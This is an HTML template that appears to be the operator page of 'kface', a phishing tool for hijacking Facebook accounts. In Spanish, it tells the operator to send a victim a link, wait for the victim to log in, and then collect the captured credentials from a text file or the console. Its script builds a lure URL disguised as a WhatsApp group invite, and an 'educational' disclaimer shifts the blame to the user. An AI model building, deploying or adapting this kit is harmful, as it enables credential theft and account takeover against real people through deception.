<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Facebook - Hack</title>
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
</head>
<body>
<!-- Image and text -->
<nav class="navbar navbar-dark bg-dark">
  <a class="navbar-brand" href="https://www.github.com/krootca">
    <img src="https://avatars.githubusercontent.com/u/101489133?s=200&v=4" width="30" height="30" class="d-inline-block align-top" alt="">
    kface - Hack a Facebook accounts
  </a>
</nav>



<div class="jumbotron">
  <h1 class="display-4">!Advertencia¡</h1>
  <p class="lead">Este programa es totalmente educativo, usa tecnicas de Ingeniería Social y Phishing, todo uso ilegal es completamente responsabilidad del cliente, cualquier daño o perjuicio ocasionado es responsabilidad del mismo.</p>
  <a class="btn btn-warning btn-lg" href="https://github.com/krootca/kface/blob/main/ADVERTENCIA.md" role="button">Leer más</a>
  <hr class="my-4">
  <p class="">1-Para usar este programa debe envíar el siguiente enlace: <a href="" id="host"></a> .</p>
  <p class="">2-Espere a que la victima se logee con su cuenta.</p>
  <p class="">3-Cuando la victima se autentifique, en la carpeta de la aplicación kface se creará un archivo de texto con los datos del usuario. </p>
  <img src="{{ url_for('static', filename = 'img/terminal.png') }}" style="box-shadow: 1px 1px 3px black; border-radius:5px;">
  <p class="">4-Tambien puedes verlo en la consola de comandos local donde aparecerá los datos en color rojo.</p>
  <img src="{{ url_for('static', filename = 'img/terminal.png') }}" style="box-shadow: 1px 1px 3px black; border-radius:5px;">
</div>

<script type="text/javascript">
	document.getElementById('host').innerHTML="https://" + window.location.hostname + "/chat.whatsapp.com/C9834gh9g5hgg45hj6j65j56het3";
	document.getElementById('host').href="/chat.whatsapp.com/C9834gh9g5hgg45hj6j65j56het3";
	
</script>


<footer class="bg-light text-center text-lg-start" style="position: absolute;bottom: 0px;width: 100%;">
  <!-- Copyright -->
  <div class="text-center p-3" style="background-color: rgba(0, 0, 0, 0.2);">
    © MIT License:
    <a class="text-dark" href="https://github.com/krootca/kface/blob/main/LICENSE">kface</a>
  </div>
  <!-- Copyright -->
   <div class="text-center p-3" style="background-color: rgba(0, 0, 0, 0.2);">
    <a class="text-dark" href="https://github.com/krootca/kface/blob/main/README.md">README</a>
  </div>
</footer>

<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.3/dist/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
</body>
</html>